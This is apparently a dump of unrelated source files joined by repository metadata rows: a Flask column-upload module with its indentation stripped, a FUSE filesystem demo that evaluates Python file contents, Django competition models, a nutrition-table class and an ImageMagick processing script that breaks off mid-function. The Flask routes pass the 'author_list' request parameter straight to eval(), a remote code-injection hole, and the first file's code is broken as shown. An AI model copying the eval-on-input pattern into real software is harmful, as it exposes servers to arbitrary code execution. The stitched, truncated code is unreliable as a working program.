title_image_name=get_secure_photoname(title_image.filename)
title_image_url=os.path.join(app.config['SPECIAL_DEST'], title_image_name)
title_image.save(title_image_url)
return app.config['HOST_NAME']+'/upload/special/'+title_image_name
# 调用美图秀秀
@app.route('/upload/tailor/special_title_image')
def upload_special_title_image():
return render_template('upload_special_title_image_tailor.html')
## 完成创建专栏的上传
@app.route('/create_special_finish', methods=['GET'])
@login_required
def create_special_finish():
if (not root_authorized()):
abort(404)
try:
title = request.args.get('title')
content = request.args.get('content')
title_image = request.args.get('title_image')
style = request.args.get('style')
total_issue = request.args.get('total_issue')
update_frequency = request.args.get('update_frequency')
except Exception:
return "failed"
authors = []
try:
author_list = eval(request.args.get('author_list'))
for nick in author_list:
author = get_userid_by_nick(nick)
if (len(author) == 0):
return "nick_error"
authors.append(author[0][0])
except Exception:
return "failed"
special_id = create_new_special(name = title,
#user_id = author[0][0],
picture = title_image,
introduction = content,
style = style,
total_issue = total_issue,
update_frequency = update_frequency)
for author in authors:
create_new_special_author(special_id, author)
return str(special_id)
## 完成修改专栏
@app.route('/modify_special_finish', methods=['GET'])
@login_required
def modify_special_finish():
if (not root_authorized()):
abort(404)
try:
title = request.args.get('title')
content = request.args.get('content')
title_image = request.args.get('title_image')
style = request.args.get('style')
total_issue = request.args.get('total_issue')
update_frequency = request.args.get('update_frequency')
except Exception:
return "failed"
authors = []
try:
author_list = eval(request.args.get('author_list'))
for nick in author_list:
author = get_userid_by_nick(nick)
if (len(author) == 0):
return "nick_error"
authors.append(author[0][0])
except Exception:
return "failed"
try:
special_id = modify_special_func(name = title,
#user_id = author[0][0],
authors = authors,
picture = title_image,
introduction = content,
style = style,
total_issue = total_issue,
update_frequency = update_frequency)
return str(special_id)
except Exception:
return "failed"
## 编辑专栏文章
@app.route('/special_article_upload', methods=['GET'])
@login_required
def special_article_upload():
try:
special_id = int(request.args.get('id'))
except Exception:
abort(404)
####TODO
#author = get_special_information(special_id).user_id
#login_user = get_userid_from_session()
if (not root_authorized()):
abort(404)
article_session_id = get_article_session_id()
session['special_article_session_id'] = str(article_session_id)
session['special_id'] = str(special_id)
os.makedirs(os.path.join(app.config['ARTICLE_CONTENT_DEST'], str(article_session_id)))
return render_template('special_article_upload.html')
# 修改专栏文章
@app.route('/special_article_modify/article/<int:article_id>')
@login_required
def special_article_modify(article_id):
article = get_article_information(article_id)
try:
special_id = int(article[0].special_id)
except Exception:
abort(404)
if (not root_authorized()):
abort(404)
session['special_id'] = str(article[0].special_id)
session['special_article_session_id'] = str(article[0].article_session_id)
return render_template('special_article_modify.html',
article=article[0], book=article[2],
get_author = get_nick_by_userid)
# 删除专栏文章
@app.route('/special_article_remove', methods=['GET'])
def special_article_remove():
try:
article_id = request.args.get('id')
except Exception:
return "failed"
user_id = get_userid_from_session()
if delete_article_by_article_id(article_id, user_id) == 'fail':
return "failed"
return "success"
## 上传专栏文章
##TODO:可能是存在数据库中的草稿提交过来的,这时候只需要把is_draft字段更改就行
@app.route('/special_article_finish', methods=['POST'])
def special_article_finish():
content = request.form['content']
title = request.form['title']
##TODO 文章标题的安全性过滤
title_image=request.form['title_image']
abstract_abstract_with_img=request.form['abstract']
book_picture=request.form['book_picture']
book_author=request.form['book_author']
book_press=request.form['book_press']
book_page_num=request.form['book_page_num']
book_price=request.form['book_price']
book_press_time=request.form['book_press_time']
book_title=request.form['book_title']
book_ISBN=request.form['book_ISBN']
book_binding=request.form['book_binding']
special_author = request.form['special_author']
try:
user_id = get_userid_by_nick(special_author)[0][0]
if not has_special_author(int(session['special_id']), user_id):
raise Exception
except Exception:
return "nick"
abstract_plain_text=get_abstract_plain_text(abstract_abstract_with_img)
if len(abstract_plain_text)<191:
abstract=abstract_plain_text[0:len(abstract_plain_text)-1]+'......'
else:
abstract=abstract_plain_text[0:190]+'......'
book_id = create_book(book_picture = book_picture,
book_author = book_author,
book_press = book_press,
book_page_num = book_page_num,
book_price = book_price,
book_press_time = book_press_time,
book_title = book_title,
book_ISBN = book_ISBN,
book_binding = book_binding)
article_id=create_article(title = title, content = content,
title_image = title_image, user_id = user_id,
article_session_id = session['special_article_session_id'],
is_draft ='0', special_id = int(session['special_id']),
group_id = '3', category_id = '0',
abstract = abstract,
book_id = book_id)
update_article_num_for_special(int(session['special_id']),True)
session.pop('special_id', None)
session.pop('special_article_session_id', None)
return str(article_id)
# 上传专栏草稿
@app.route('/special_article_draft',methods=['POST'])
def special_article_draft():
content=request.form['content']
##TODO 文章标题的安全性过滤
title=request.form['title']
title_image=request.form['title_image']
abstract_abstract_with_img=request.form['abstract']
book_picture=request.form['book_picture']
book_author=request.form['book_author']
book_press=request.form['book_press']
book_page_num=request.form['book_page_num']
book_price=request.form['book_price']
book_press_time=request.form['book_press_time']
book_title=request.form['book_title']
book_ISBN=request.form['book_ISBN']
book_binding=request.form['book_binding']
special_author = request.form['special_author']
try:
user_id = get_userid_by_nick(special_author)[0][0]
if not has_special_author(int(session['special_id']), user_id):
raise Exception
except Exception:
return "nick"
abstract_plain_text=get_abstract_plain_text(abstract_abstract_with_img)
if len(abstract_plain_text)<191:
abstract=abstract_plain_text[0:len(abstract_plain_text)-1]+'......'
else:
abstract=abstract_plain_text[0:190]+'......'
#create_article(title=title,content=content,title_image=title_image,user_id=user_id,article_session_id=session['article_session_id'],is_draft='1',group_id=group_id,category_id=category_id,abstract=abstract)
book_id=create_book(book_picture=book_picture,book_author=book_author,book_press=book_press,book_page_num=book_page_num,book_price=book_price,book_press_time=book_press_time,book_title=book_title,book_ISBN=book_ISBN,book_binding=book_binding)
article_id=create_article(title = title, content = content,
title_image = title_image, user_id = user_id,
article_session_id = session['special_article_session_id'],
is_draft ='1', special_id = int(session['special_id']),
group_id = '3', category_id = '0',
abstract = abstract,
book_id = book_id)
return str(article_id)
################################## 专栏详情页面 ##################################
@app.route('/upload/special/<filename>')
def uploaded_special_image(filename):
return send_from_directory(app.config['SPECIAL_DEST'],filename)
| apache-2.0 | -2,346,905,578,882,769,400 | 39.595238 | 246 | 0.548446 | false | 3.837497 | false | false | false |
Roger/defuse | examples/evalfs.py | 1 | 2562 | import sys
import traceback
from stat import S_IRUSR, S_IXUSR, S_IWUSR, S_IRGRP, S_IXGRP, S_IXOTH, S_IROTH
from errno import ENOENT
import fuse
from fs import FS, BaseMetadata
fs = FS.get()
class Out(object):
def __init__(self):
self.out = ''
def write(self, data):
self.out += data
def read(self):
return self.out
def evalcode(code):
old_stdout = sys.stdout
try:
new_stdout = Out()
sys.stdout = new_stdout
eval(compile(code, "<eval>", "exec"))
return new_stdout.read()
except:
error = traceback.format_exc().strip().split("\n")[-1]
return error
finally:
sys.stdout = old_stdout
@fs.route('/eval')
@fs.route('/eval/<filepath>.py')
class Eval(object):
def __init__(self):
file_mode = S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH
self.file_metadata = BaseMetadata(file_mode, False)
root_mode = S_IRUSR|S_IXUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXOTH|S_IROTH
self.dir_metadata = BaseMetadata(root_mode, True)
self.files = {}
def create(self, *args, **kwargs):
self.files[kwargs['filepath']] = ''
return 0
def open(self, flags, **kwargs):
return 0
def getattr(self, *args, **kwargs):
if 'filepath' in kwargs:
data = kwargs['filepath']
if data not in self.files:
return -ENOENT
data = evalcode(self.files[data])
self.file_metadata.st_size = len(data)
return self.file_metadata
return self.dir_metadata
def readdir(self, *args, **kwargs):
for i in self.files:
yield fuse.Direntry('%s.py' % i)
def read(self, size, offset, *args, **kwargs):
key = kwargs['filepath']
data = evalcode(self.files[key])
return data[offset:size+offset]
def write(self, buf, offset, fh=None, **kwargs):
key = kwargs['filepath']
prev_data = self.files[key]
new_data = prev_data[:offset] + buf + prev_data[offset+len(buf):]
if offset + len(new_data) > len(prev_data):
self.truncate(offset + len(new_data), filepath=key)
self.files[key] = new_data
return len(buf)
def truncate(self, size, fh=None, **kwargs):
key = kwargs['filepath']
prev_data = self.files[key]
prev_size = len(prev_data)
if size > prev_size:
new_data = prev_data + (size - prev_size)*"0"
else:
new_data = prev_data[0:size]
self.files[key] = new_data
| bsd-3-clause | -7,717,536,393,655,769,000 | 25.142857 | 78 | 0.567916 | false | 3.353403 | false | false | false |
matus-stehlik/glowing-batman | competitions/models.py | 1 | 5313 | from django.contrib.auth.models import Group
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.timezone import now
from base.util import with_timestamp, with_author, remove_accents
# Competition-related models
@with_author
@with_timestamp
class Competition(models.Model):
"""
Represents a competition. One roots site will usually hold several
competitions, as there are usually several age categories or several
subjects categories. Or both.
"""
name = models.CharField(max_length=100)
organizer_group = models.ForeignKey(Group, blank=True, null=True)
# Fields added via foreign keys:
# competitionorgregistration_set
# competitionuserregistration_set
# gallery_set
# leaflet_set
# post_set
# problemset_set
# season_set
# user_set
def __unicode__(self):
return self.name
class Meta:
ordering = ['name']
verbose_name = 'Competition'
verbose_name_plural = 'Competitions'
@with_author
@with_timestamp
class CompetitionUserRegistration(models.Model):
"""
Represents a relation between user and competition. User himself can
register into competition if he satisfies the conditions.
"""
competition = models.ForeignKey('competitions.Competition')
user = models.ForeignKey('profiles.UserProfile')
def __unicode__(self):
return (self.user.__unicode__() + u" competes in " +
self.competition.__unicode__())
class Meta:
ordering = ['added_at']
verbose_name = 'User registration'
verbose_name_plural = 'User registrations'
@with_author
@with_timestamp
class CompetitionOrgRegistration(models.Model):
"""
Represents a relation between organizer and comeptition. Organizer can
help organize multiple competitions. Organizer registrations have to
be approved.
"""
competition = models.ForeignKey('competitions.Competition')
organizer = models.ForeignKey('profiles.UserProfile')
approved = models.BooleanField()
def __unicode__(self):
return (self.organizer.__unicode__() + u" organizes " +
self.competition.__unicode__())
class Meta:
ordering = ['added_at']
verbose_name = 'Organizer registration'
verbose_name_plural = 'Organizer registration'
@with_author
@with_timestamp
class Season(models.Model):
"""
Represents an one season of a competition. This is usually autumn or spring
season. Using this model, however, we are not limited to 2 seasons per year.
During each Season there might be several ProblemSets published as parts
of that season.
"""
competition = models.ForeignKey('competitions.Competition')
year = models.IntegerField()
number = models.IntegerField()
name = models.CharField(max_length=50)
join_deadline = models.DateTimeField(blank=True, null=True)
def __unicode__(self):
template = "{name} ({competition} {year}-{number})"
return template.format(competition=remove_accents(self.competition),
year=self.year,
number=self.number,
name=remove_accents(self.name),
)
class Meta:
ordering = ['competition', 'year', 'number']
verbose_name = 'Season'
verbose_name_plural = 'Seasons'
@with_author
@with_timestamp
class Series(models.Model):
"""
Represents one series of problems in the season of the competetion.
"""
season = models.ForeignKey('competitions.Season')
name = models.CharField(max_length=50)
number = models.PositiveSmallIntegerField()
problemset = models.OneToOneField('problems.ProblemSet', blank=True,
null=True)
submission_deadline = models.DateTimeField()
is_active = models.BooleanField(default=False)
def is_past_submission_deadline(self):
return now() > self.submission_deadline
def is_nearest_deadline(self):
# Series are returned sorted by the submission deadline
active_series = [s for s in Series.objects.all()
if not s.is_past_submission_deadline()]
if active_series:
return active_series[0] == self
else:
return False
def clean(self, *args, **kwargs):
if self.is_active:
if not self.submission_deadline:
raise ValidationError("Submission deadline must be set to "
"make the series active")
if not self.problemset:
raise ValidationError("Corresponding set of problems must be "
"set to make the series active")
if self.is_past_submission_deadline():
raise ValidationError("Series that is past its submission "
"deadline cannot be made active")
super(Series, self).save(*args, **kwargs)
def __unicode__(self):
return self.name
class Meta:
ordering = ['submission_deadline']
unique_together = ('season', 'number')
verbose_name = 'Series'
verbose_name_plural = 'Series'
| mit | 4,559,148,231,431,446,000 | 30.625 | 80 | 0.632788 | false | 4.344235 | false | false | false |
Thierry46/CalcAl | model/TotalLine.py | 1 | 6973 | # -*- coding: utf-8 -*-
"""
************************************************************************************
Class : TotalLine
Author : Thierry Maillard (TMD)
Date : 28/10/2016 - 18/11/2016
Role : Define a TotalLine for food table.
Licence : GPLv3
Copyright (c) 2016 - Thierry Maillard
This file is part of CalcAl project.
CalcAl project is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CalcAl project is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CalcAl project. If not, see <http://www.gnu.org/licenses/>.
Modif. :
- dictComponentsValueStr is calculated when calling getFormattedValue()
- getFormattedValue accepts 1 parameter : nbDays
************************************************************************************
"""
from model import ModelBaseData
from model import Component
from util import CalcalExceptions
class TotalLine(ModelBaseData.ModelBaseData):
""" Model for a TotalLine """
def __init__(self, configApp):
super(TotalLine, self).__init__(configApp, None, "TotalLine")
self.setData("containValues", False)
self.setData("name", _("Total"))
self.setData("quantity", 0.0)
self.setData("dictComponentsQualifierQuantity", dict())
# table for qualification reduction rules
self.qRulesS = self.configApp.get('QualifValue', 'QRulesS').split(";")
self.qRules0 = self.configApp.get('QualifValue', 'QRules0').split(";")
self.qRulesO = self.configApp.get('QualifValue', 'QRulesO').split(";")
self.logger.debug("Created in model" + str(self))
def update(self, dictFoodStuff):
""" Update total line value according value in parent """
# Get values of all foodstuff in model
nbFoodStuff = len(dictFoodStuff)
if nbFoodStuff > 0:
# Sum quantities of each food
self.setData("quantity", 0.0)
for foodStuff in dictFoodStuff.values():
self.setData("quantity", self.getData("quantity") + foodStuff.getData("quantity"))
# Sum all components values and qualifiers
dictQualifierQuantity = dict()
for foodStuff in dictFoodStuff.values():
for codeComponent, component in foodStuff.dictComponents.items():
qualifValue = component.getData("qualifValue")
quantity = component.getData("quantity")
if codeComponent in dictQualifierQuantity.keys():
dictQualifierQuantity[codeComponent][0] += qualifValue
dictQualifierQuantity[codeComponent][1] += quantity
else:
dictQualifierQuantity[codeComponent] = [qualifValue, quantity]
# Reduce qualifiers and format all components
self.getData("dictComponentsQualifierQuantity").clear()
for codeComponent, qualifierQuantity in dictQualifierQuantity.items():
qualifierQuantity[0] = self.reducQualifier(qualifierQuantity[0],
qualifierQuantity[1])
self.getData("dictComponentsQualifierQuantity")[codeComponent] = \
[qualifierQuantity[0],
qualifierQuantity[1]]
def reducQualifier(self, qualif2Reduce, value):
""" Reduce qualif2Reduce expression by applying rules read in config file """
qualifResult = "".join(set(qualif2Reduce))
nbReduction = 0
while nbReduction < 5 and len(qualifResult) > 1:
# Apply rules
if value >= float(self.configApp.get("Limits", "near0")):
qRule2apply = self.qRulesS
else: # For value near 0
qRule2apply = self.qRules0
qRule2apply = qRule2apply + self.qRulesO
for rule in qRule2apply:
if rule[0] in qualifResult and rule[1] in qualifResult:
qualifResult = qualifResult.replace(rule[0], rule[2])
qualifResult = qualifResult.replace(rule[1], rule[2])
qualifResult = "".join(set(qualifResult))
nbReduction = nbReduction + 1
if nbReduction >= 5:
raise CalcalExceptions.CalcalInternalError(self.configApp,
"reducQualifier don't converge : " +
qualif2Reduce +
" can't be reduce : " + qualifResult +
". Check config/[QualifValue]/QRules")
return qualifResult
def getFormattedValue(self, nbDays=1):
""" Return name, quantity and dict(codeComponents) = qty formated
for all components of this total line
V0.38 : build dictComponentsValueStr
getFormattedValue accept 1 optional parameter : Nb days
Parameter nbDays : all returned values are divided by this integer """
assert nbDays > 0, "TotalLine/getFormattedValue() : nbDays must be > 0 " + str(nbDays)
dictComponentsValueStr = dict()
for codeComponent, qualifierQuantity \
in self.getData("dictComponentsQualifierQuantity").items():
dictComponentsValueStr[codeComponent] = \
Component.Component.getValueFormatedStatic(self.configApp,
qualifierQuantity[0],
qualifierQuantity[1] / float(nbDays))
totalName = self.getData("name")
totalQuantity = self.getData("quantity")
if nbDays > 1:
totalName += " " + _("per day")
totalQuantity /= float(nbDays)
return totalName, round(totalQuantity, 1), dictComponentsValueStr
def getRawValue(self):
""" Return name, quantity and dict(codeComponents) = [Qualifier, quantity]
for all components of this total line """
return self.getData("name"), self.getData("quantity"), \
self.getData("dictComponentsQualifierQuantity")
def normalise4for100g(self):
""" Normalise all components quantities for 100g of products """
ratio = 100. / self.getData("quantity")
for fieldsComponent in self.getData("dictComponentsQualifierQuantity").values():
fieldsComponent[1] *= ratio
self.setData("quantity", 100.)
| gpl-3.0 | -885,870,072,206,995,200 | 47.423611 | 100 | 0.588986 | false | 4.624005 | true | false | false |
relic7/prodimages | python/magicColorspaceModAspctLoadFaster.py | 1 | 21256 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, re, csv
def copy_to_imagedrop_upload(src_filepath, destdir=None):
import pycurl, os, shutil, re
regex_colorstyle = re.compile(r'^.*?/[0-9]{9}[_altm0-6]{,6}?\.[jpngJPNG]{3}$')
if not regex_colorstyle.findall(src_filepath):
print src_filepath.split('/')[-1], ' Is Not a valid Bluefly Colorstyle File or Alt Out of Range'
return
else:
if not destdir:
destdir = '/mnt/Post_Complete/ImageDrop'
imagedrop = os.path.abspath(destdir)
localFileName = src_filepath.split('/')[-1]
imagedropFilePath = os.path.join(imagedrop, localFileName.lower())
try:
if os.path.isfile(imagedropFilePath):
try:
os.remove(imagedropFilePath)
#os.rename(src_filepath, imagedropFilePath)
shutil.copyfile(src_filepath, imagedropFilePath)
return True
except:
print 'Error ', imagedropFilePath
return False
#shutil.copyfile(src_filepath, imagedropFilePath
else:
##os.rename(src_filepath, imagedropFilePath)
shutil.copyfile(src_filepath, imagedropFilePath)
return True
except:
return False
def rename_retouched_file(img):
import os,re
regex_coded = re.compile(r'.+?/[1-9][0-9]{8}_[1-6]\.[jJpPnNgG]{3}')
imgfilepath = img
if re.findall(regex_coded,imgfilepath):
filedir = imgfilepath.split('/')[:-1]
filedir = '/'.join(filedir)
print filedir
filename = imgfilepath.split('/')[-1]
colorstyle = str(filename[:9])
testimg = filename.split('_')[-1]
alttest = testimg.split('.')[0]
ext = filename.split('.')[-1]
ext = ".{}".format(ext.lower())
if str.isdigit(alttest) & len(alttest) == 1:
if alttest == '1':
src_img_primary = img.replace('_1.','.')
os.rename(img, src_img_primary)
return src_img_primary
else:
alttest = int(alttest)
print alttest
alttest = alttest - 1
alt = '_alt0{}'.format(str(alttest))
print alt
if alt:
filename = "{}{}{}".format(colorstyle,alt,ext)
renamed = os.path.join(filedir, filename)
print renamed
if renamed:
os.rename(img, renamed)
if os.path.isfile(renamed):
return renamed
else:
return img
def get_aspect_ratio(img):
from PIL import Image
try:
im = Image.open(img)
w,h = im.size
aspect_ratio = str(round(float(int(h))/float(int(w)),2))
return aspect_ratio
except IOError:
pass
def get_dimensions(img):
from PIL import Image
try:
im = Image.open(img)
w,h = im.size
dimensions = "{0}x{1}".format(int(w),int(h))
return dimensions
except IOError:
pass
def get_exif_metadata_value(img, exiftag=None):
import pyexiv2
image_metadata = pyexiv2.ImageMetadata(img)
metadata = image_metadata.read()
if exiftag:
exifvalue = metadata[exiftag]
return (exiftag, exifvalue)
else:
metadict = {}
for mtag, mvalue in metadata.iteritems():
metadict[mtag] = mvalue
return metadict
def get_image_color_minmax(img):
import subprocess, os, sys, re
try:
ret = subprocess.check_output(['convert', img, '-median', '3', '+dither', '-colors', '2', '-trim', '+repage', '-gravity', 'center', '-crop', "50%", '-depth', '8', '-format', '%c',"histogram:info:-"])
except:
return ''
colorlow = str(ret).split('\n')[0].strip(' ')
colorlow = re.sub(re.compile(r',\W'),',',colorlow).replace(':','',1).replace('(','').replace(')','').replace(' ',' ').split(' ')
colorhigh = str(ret).split('\n')[1].strip(' ')
colorhigh = re.sub(re.compile(r',\W'),',',colorhigh).replace(':','',1).replace('(','').replace(')','').replace(' ',' ').split(' ')
fields_top = ['low_rgb_avg', 'high_rgb_avg']
fields_level2 = ['total_pixels', 'rgb_vals', 'webcolor_id', 'color_profile_vals']
colorlow = zip(fields_level2,colorlow)
colorhigh = zip(fields_level2,colorhigh)
if len(colorhigh) == len(colorlow):
coloravgs = dict(colorlow),dict(colorhigh)
colordata = zip(fields_top, coloravgs)
colordata = dict(colordata)
colordata['comp_level'] = 'InRange'
return colordata
elif len(colorhigh) < len(colorlow):
coloravgs = dict(colorlow)
colordata = {}
colordata[fields_top[0]] = coloravgs
colordata[fields_top[1]] = {'total_pixels': 0}
colordata['comp_level'] = 'Bright'
return colordata
elif len(colorhigh) > len(colorlow):
coloravgs = dict(colorhigh)
colordata = {}
colordata[fields_top[1]] = coloravgs
colordata[fields_top[0]] == {'total_pixels': 0}
colordata['comp_level'] = 'Dark'
return colordata
def evaluate_color_values(colordata):
high_range_pixels = ''
low_range_pixels = ''
high_range_pixels = float((colordata['high_rgb_avg']['total_pixels']))
low_range_pixels = float((colordata['low_rgb_avg']['total_pixels']))
try:
if low_range_pixels >= high_range_pixels and high_range_pixels != 0:
r,g,b = colordata['high_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
high_avg = float(round((r+b+g)/3,2))
r,g,b = colordata['low_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
low_avg = float(round((r+b+g)/3,2))
ratio = round(float(float(low_range_pixels)/float(high_range_pixels)),2)
print high_avg/(low_avg*ratio)
return high_avg,low_avg,ratio, 'LOW'
elif low_range_pixels < high_range_pixels and low_range_pixels != 0:
r,g,b = colordata['high_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
high_avg = float(round((r+b+g)/3,2))
r,g,b = colordata['low_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
low_avg = float(round((r+b+g)/3,2))
ratio = round(float(float(low_range_pixels)/float(high_range_pixels)),2)
print low_avg/(high_avg*ratio)
return high_avg,low_avg,ratio, 'HIGH'
except TypeError:
print "Type Error"
pass
except ValueError:
print "Value Error", colordata
pass
def sort_files_by_values(directory):
import os,glob
filevalue_dict = {}
fileslist = directory
count = len(fileslist)
for f in fileslist:
values = {}
colordata = get_image_color_minmax(f)
try:
high,low,ratio, ratio_range = evaluate_color_values(colordata)
values['ratio'] = ratio
values['ratio_range'] = ratio_range
if ratio_range == 'LOW':
values['low'] = low ##
values['high'] = high
if ratio_range == 'HIGH':
values['high'] = high ##
values['low'] = low
filevalue_dict[f] = values
count -= 1
print "{0} Files Remaining".format(count)
except TypeError:
filevalue_dict[f] = {'ratio_range': 'OutOfRange'}
count -= 1
print "{0} Files Remaining-TypeError".format(count)
pass
except ZeroDivisionError:
filevalue_dict[f] = {'ratio_range': 'OutOfRange'}
count -= 1
print "{0} Files Remaining-ZeroDivision".format(count)
pass
return filevalue_dict
def subproc_magick_large_jpg(img, destdir=None):
import subprocess,os,re
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
os.chdir(os.path.dirname(img))
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
if not regex_alt.findall(img):
outfile = os.path.join(destdir, img.split('/')[-1][:9] + '_l.jpg')
dimensions = ''
aspect_ratio = get_aspect_ratio(img)
dimensions = get_dimensions(img)
width = dimensions.split('x')[0]
height = dimensions.split('x')[1]
if aspect_ratio == '1.2':
vert_horiz = '400x480'
elif float(aspect_ratio) > float(1.2):
vert_horiz = 'x480'
elif float(aspect_ratio) < float(1.2):
vert_horiz = '400x'
dimensions = "400x480"
print dimensions,vert_horiz
if regex_valid_style.findall(img):
subprocess.call([
'convert',
'-colorspace',
'sRGB',
img,
'-background',
'white',
"-filter",
"Spline",
"-filter",
"Cosine",
"-define",
"filter:blur=0.9891028367558475",
"-distort",
"Resize",
vert_horiz,
'-extent',
dimensions,
"-colorspace",
"sRGB",
"-format",
"jpeg",
'-unsharp',
'2x1.24+0.5+0',
'-quality',
'95',
outfile
])
return outfile
else:
return img
else:
pass
def subproc_magick_medium_jpg(img, destdir=None):
import subprocess,os,re
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
os.chdir(os.path.dirname(img))
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
if regex_alt.findall(img):
outfile = os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.jpg')
else:
outfile = os.path.join(destdir, img.split('/')[-1][:9] + '_m.jpg')
dimensions = ''
aspect_ratio = get_aspect_ratio(img)
dimensions = get_dimensions(img)
width = dimensions.split('x')[0]
height = dimensions.split('x')[1]
if aspect_ratio == '1.2':
vert_horiz = '200x240'
elif float(aspect_ratio) > float(1.2):
vert_horiz = 'x240'
elif float(aspect_ratio) < float(1.2):
vert_horiz = '200x'
dimensions = '200x240'
print dimensions,vert_horiz
if regex_valid_style.findall(img):
subprocess.call([
'convert',
'-colorspace',
'sRGB',
img,
'-background',
'white',
"-filter",
"Spline",
"-filter",
"Cosine",
"-define",
"fliter:blur=0.9891028367558475",
"-distort",
"Resize",
vert_horiz,
'-extent',
dimensions,
"-colorspace",
"sRGB",
"-format",
"jpeg",
'-unsharp',
'2x1.1+0.5+0',
'-quality',
'95',
outfile
])
return outfile
else:
return img
def subproc_magick_png(img, rgbmean=None, destdir=None):
import subprocess,re,os
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
modulator = ''
modulate = ''
if not destdir:
destdir = '.'
#imgdestpng_out = os.path.join(tmp_processing, os.path.basename(imgsrc_jpg))
os.chdir(os.path.dirname(img))
if not rgbmean:
ratio_range = 'OutOfRange'
else:
try:
ratio_range = rgbmean['ratio_range']
except:
ratio_range = 'OutOfRange'
pass
if ratio_range != 'OutOfRange':
high = rgbmean['high']
low = rgbmean['low']
ratio = rgbmean['ratio']
#rgbmean = float(128)
#rgbmean = get_image_color_minmax(img)
if ratio_range == 'LOW':
if float(round(high,2)) > float(240):
modulator = '-modulate'
modulate = '104,100'
elif float(round(high,2)) > float(200):
modulator = '-modulate'
modulate = '107,110'
elif float(round(high,2)) > float(150):
modulator = '-modulate'
modulate = '110,110'
else:
modulator = '-modulate'
modulate = '112,110'
elif ratio_range == 'HIGH':
if float(round(high,2)) > float(230):
modulator = '-modulate'
modulate = '100,100'
elif float(round(high,2)) > float(200):
modulator = '-modulate'
modulate = '103,100'
elif float(round(high,2)) > float(150):
modulator = '-modulate'
modulate = '105,105'
else:
modulator = '-modulate'
modulate = '108,107'
elif ratio_range == 'OutOfRange':
modulator = '-modulate'
modulate = '100,100'
format = img.split('.')[-1]
os.chdir(os.path.dirname(img))
## Destination name
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
outfile = os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
dimensions = ''
## Get variable values for processing
aspect_ratio = get_aspect_ratio(img)
dimensions = get_dimensions(img)
width = dimensions.split('x')[0]
height = dimensions.split('x')[1]
if aspect_ratio == '1.2':
vert_horiz = '{0}x{1}'.format(width,height)
dimensions = '{0}x{1}'.format(int(width),int(height))
elif float(aspect_ratio) > float(int(1.2)):
vert_horiz = 'x{0}'.format(height)
w = float(0.8) * float(height)
#w = float(round(w,2)*float(aspect_ratio))
dimensions = '{0}x{1}'.format(int(w),int(height))
print "W",w, aspect_ratio
elif float(aspect_ratio) < float(1.2):
vert_horiz = '{0}x'.format(width)
h = float(1.2) * float(width)
#h = float(round(h,2)*float(aspect_ratio))
dimensions = '{0}x{1}'.format(int(width),int(h))
print "H",h, aspect_ratio
if not dimensions:
dimensions = '100%'
vert_horiz = '100%'
subprocess.call([
'convert',
'-format',
format,
img,
'-define',
'png:preserve-colormap',
'-define',
'png:format\=png24',
'-define',
'png:compression-level\=N',
'-define',
'png:compression-strategy\=N',
'-define',
'png:compression-filter\=N',
'-format',
'png',
'-modulate',
modulate,
"-define",
"filter:blur=0.625",
#"filter:blur=0.88549061701764",
"-distort",
"Resize",
vert_horiz,
'-background',
'white',
'-gravity',
'center',
'-extent',
dimensions,
"-colorspace",
"sRGB",
'-unsharp',
'2x2.7+0.5+0',
'-quality',
'95',
os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
])
print 'Done {}'.format(img)
return os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
def upload_imagedrop(root_dir):
import os, sys, re, csv, shutil, glob
archive_uploaded = os.path.join(root_dir, 'uploaded')
tmp_failed = os.path.join(root_dir, 'failed_upload')
try:
os.makedirs(archive_uploaded, 16877)
except OSError:
try:
shutil.rmtree(archive_uploaded, ignore_errors = True)
os.makedirs(archive_uploaded, 16877)
except:
pass
try:
os.makedirs(tmp_failed, 16877)
except:
pass
import time
upload_tmp_loading = glob.glob(os.path.join(root_dir, '*.*g'))
for upload_file in upload_tmp_loading:
try:
code = copy_to_imagedrop_upload(upload_file)
if code == True or code == '200':
try:
shutil.move(upload_file, archive_uploaded)
time.sleep(float(.1))
print "1stTryOK", upload_file
except:
dst_file = upload_file.replace(root_dir, archive_uploaded)
try:
if os.path.exists(dst_file):
os.remove(dst_file)
shutil.move(upload_file, archive_uploaded)
except:
pass
else:
print "Uploaded {}".format(upload_file)
time.sleep(float(.1))
try:
shutil.move(upload_file, archive_uploaded)
except shutil.Error:
pass
except OSError:
print "Error moving Finals to Arch {}".format(file)
try:
shutil.move(upload_file, tmp_failed)
except shutil.Error:
pass
try:
